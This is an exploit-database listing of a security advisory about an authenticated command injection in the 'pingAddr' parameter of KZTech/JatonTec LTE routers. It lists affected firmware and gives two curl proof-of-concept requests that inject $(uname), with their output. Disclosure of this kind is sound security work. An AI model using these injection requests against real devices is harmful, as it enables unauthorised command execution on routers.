Exploit for KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Authenticated Command Injection

Name: Exploit for KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Authenticated Command Injection
Rating: 5 (243 reviews)
2021-03-19 | CVSS 0.2
## https://sploitus.com/exploit?id=PACKETSTORM:161881
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Authenticated Command Injection  
  
  
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.  
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk  
http://www.jatontec.com/products/show.php?itemid=258  
http://www.jatontech.com/CAT12.html#_pp=105_564  
http://www.kzbtech.com/AM3300V.html  
https://neotel.mk/ostanati-paketi-2/  
  
Affected version: Model | Firmware  
-------|---------  
JT3500V | 2.0.1B1064  
JT3300V | 2.0.1B1047  
AM6200M | 2.0.0B3210  
AM6000N | 2.0.0B3042  
AM5000W | 2.0.0B3037  
AM4200M | 2.0.0B2996  
AM4100V | 2.0.0B2988  
AM3500MW | 2.0.0B1092  
AM3410V | 2.0.0B1085  
AM3300V | 2.0.0B1060  
AM3100E | 2.0.0B981  
AM3100V | 2.0.0B946  
AM3000M | 2.0.0B21  
KZ7621U | 2.0.0B14  
KZ3220M | 2.0.0B04  
KZ3120R | 2.0.0B01  
  
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi  
& VoIP CPE product specially designed to enable quick and easy  
LTE fixed data service deployment for residential and SOHO customers.  
It provides high speed LAN, Wi-Fi and VoIP integrated services  
to end users who need both bandwidth and multi-media data service  
in residential homes or enterprises. The device has 2 Gigabit LAN  
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and  
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing  
and firewall software for security. It provides an effective  
all-in-one solution to SOHO or residential customers. It can  
deliver up to 1Gbps max data throughput which can be very  
competitive to wired broadband access service.  
  
Desc: The application suffers from an authenticated OS command  
injection vulnerability. This can be exploited to inject and  
execute arbitrary shell commands through the 'pingAddr' HTTP  
POST parameter bypassing the injection protection filter.  
  
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN  
Linux 2.6.36+ (mips)  
Mediatek APSoC SDK v4.3.1.0  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5635  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php  
  
  
03.02.2021  
  
--  
  
  
#JT3300V/AM3300V  
lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \  
--data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \  
-H "Cookie: kz_userid=admin:311139" \  
-H "X-Requested-With: XMLHttpRequest"  
ping: bad address 'Linux'  
lqwrm@metalgear:~/prive$   
  
  
#JT3500V  
lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \  
--data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \  
-H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \  
-H "X-Requested-With: XMLHttpRequest"  
ping: bad address 'Linux'  
lqwrm@metalgear:~/prive$